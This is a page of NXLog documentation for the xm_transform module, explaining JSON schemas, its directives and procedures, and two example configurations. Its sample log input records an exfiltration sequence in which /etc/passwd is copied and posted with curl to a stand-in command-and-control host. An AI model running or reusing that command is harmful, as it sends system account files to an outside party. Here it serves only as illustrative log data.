NXLog Legacy Documentation

Transform (xm_transform)

This module allows normalizing log data according to a specified schema. It accepts file-based schemas in JSON format and supports dynamically setting the schema file.

The module is intended to be used with the JSON (xm_json) extension.

To check which platforms support this module, see the list of installer packages in the Available Modules chapter.

Schema definition

You must define one or more event schemas in JSON format and save each schema in a separate file. The schema can include constant strings and event fields.

Basic event schema
{
  "agent_name": "NXLog Agent", (1)
  "message": "$raw_event" (2)
}
1 Sets the agent_name property to NXLog Agent for every log record.
2 Sets the message property to the value of the $raw_event core field.

The schema can also contain nested JSON objects. For example, the following schema includes a metadata property containing an object.

Schema with nested object
{
  "message": "$raw_event",
  "metadata": {
    "agent": {
      "name": "NXLog Agent",
      "ingestion": "$EventReceivedTime"
    }
  }
}

See Event records and fields for more information on how NXLog parses log records into fields.

Configuration

The xm_transform module accepts the following directives in addition to the common module directives.

Optional directives

Schema

Specify the path to a schema file. NXLog formats log records using this schema when you process them with this extension.

SchemaDir

Specify the path to a folder containing your schema files. NXLog looks for the schema files specified by the Schema and SchemaMap directives in this folder. The default is the folder that contains the configuration file where the xm_transform instance is defined.

SchemaMap

Use this directive to map names to schema files. You can pass these names to the set_schema() procedure to set the schema dynamically.

NXLog drops events that do not match any schema. We recommend always specifying a default schema to avoid data loss.

See Setting the schema dynamically below for an example.
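
As a minimal sketch of how the Schema and SchemaDir directives work together, the fragment below keeps the schema files in a dedicated folder and refers to the schema by file name only. The folder path /opt/nxlog/etc/schemas and the instance name transform are assumptions chosen for illustration; substitute the values from your own deployment.

```conf
<Extension transform>
    Module       xm_transform
    # Hypothetical folder, not a path mandated by NXLog.
    SchemaDir    '/opt/nxlog/etc/schemas'
    # Looked up inside SchemaDir, so no folder prefix is needed here.
    Schema       'default.json'
</Extension>
```

If SchemaDir is omitted, the same Schema value is looked up in the folder that contains the configuration file.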

Procedures

The following procedures are exported by xm_transform.

process();

Processes the current log record, transforming it according to the settings of the module instance.

set_schema(string schema_name);

Sets the schema file, overriding the default one. The schema_name must match a schema name defined by the SchemaMap directive.

Examples

Example 1. Transforming logs using a schema file

This configuration collects Linux system logs from a file and transforms log records according to a schema file.

nxlog.conf
<Extension transform>
    Module    xm_transform
    Schema    'schemas/default.json' (1)
</Extension>

<Extension json>
    Module    xm_json
</Extension>

<Input system_logs>
    Module    im_file
    File      '/var/log/syslog'
    <Exec>
        transform->process(); (2)
        to_json(); (3)
    </Exec>
</Input>
1 Defines the path of the schema file. The path is relative to the NXLog configuration folder.
2 Normalizes log records according to the schema file defined in the Schema directive.
3 Calls the to_json() procedure of xm_json to convert the record to JSON format.

The following is a basic schema file compatible with log events collected by the im_file input module. Because im_file populates only the core fields, the schema references just $raw_event and $EventReceivedTime.

default.json
{
  "Event": "$raw_event",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "$EventReceivedTime"
  }
}
Input sample
2024-09-26 16:05:47 [100]: File "/etc/passwd" 512 bytes was copied to "/tmp/steal.txt".
2024-09-26 16:05:47 [100]: Process 123 "/usr/bin/curl" with command line "-d @/tmp/steal.txt http://example-cc.bot".
2024-09-26 16:05:47 [100]: File "/tmp/steal.txt" 512 bytes was deleted.
Output sample
{
  "Event": "2024-09-26 16:05:47 [100]: File \"/etc/passwd\" 512 bytes was copied to \"/tmp/steal.txt\".",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "2024-09-26T16:06:00.984034+02:00"
  }
}
Example 2. Setting the schema dynamically

This configuration collects logs from a file and transforms log records according to the event type. It defines three event schemas: copy, delete, and spawn. It also sets a default schema for events that do not match any of the conditions.

<Extension transform>
    Module       xm_transform
    SchemaDir    'schemas/'  (1)
    
    <SchemaMap>  (2)
      copy       file-copy.json
      delete     file-delete.json
      spawn      process-create.json
      default    default.json
    </SchemaMap>

    <Exec>  (3)
      if ($raw_event =~ /File "(.+)" (\d+) bytes was deleted/) {
        $FileName = $1;
        $FileSize = $2;
        set_schema("delete");
      }
      else if ($raw_event =~ /File "(.+)" (\d+) bytes was copied to "(.+)"/) {
        $PrevFileName = $1;
        $PrevFileSize = $2;
        $FileName = $3;
        set_schema("copy");
      }
      else if ($raw_event =~ /Process (\d+) "(.+)" with command line "(.+)"/) {
        $NewProcessID = $1;
        $FileName = $2;
        $Args = $3;
        set_schema("spawn");
      }
      else {
        set_schema("default"); (4)
      }
    </Exec>
</Extension>

<Extension json>
    Module       xm_json
</Extension>

<Input access_log>
    Module       im_file
    File         '/var/log/access_log'
    <Exec>
        transform->process(); (5)
        to_json(); (6)
    </Exec>
</Input>
1 Defines the path of the directory containing the schema files. The path is relative to the NXLog configuration folder.
2 Maps names to schema files. Pass these names to set_schema() to select a schema dynamically.
3 Selects the appropriate schema dynamically, using regular expressions to parse log events and extract fields.
4 Falls back to the default schema for log events that do not match any of the regular expressions.
5 Normalizes log records according to the schema selected by set_schema().
6 Calls the to_json() procedure of xm_json to convert the record to JSON format.
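
Example 2 references schema files that are not shown. As an illustrative sketch only, file-copy.json could look like the following. It reuses the $PrevFileName, $PrevFileSize, and $FileName fields set in the Exec block and follows the layout of default.json from Example 1. The property names File, Source, SourceSize, and Destination, as well as the FILE_COPY type value, are assumptions made for this sketch and are not names required by NXLog.

```json
{
  "Event": "$raw_event",
  "File": {
    "Source": "$PrevFileName",
    "SourceSize": "$PrevFileSize",
    "Destination": "$FileName"
  },
  "Metadata": {
    "Type": "FILE_COPY",
    "IngestionTime": "$EventReceivedTime"
  }
}
```

The file-delete.json and process-create.json schemas would follow the same pattern, referencing $FileName and $FileSize for deletions, and $NewProcessID, $FileName, and $Args for process creation.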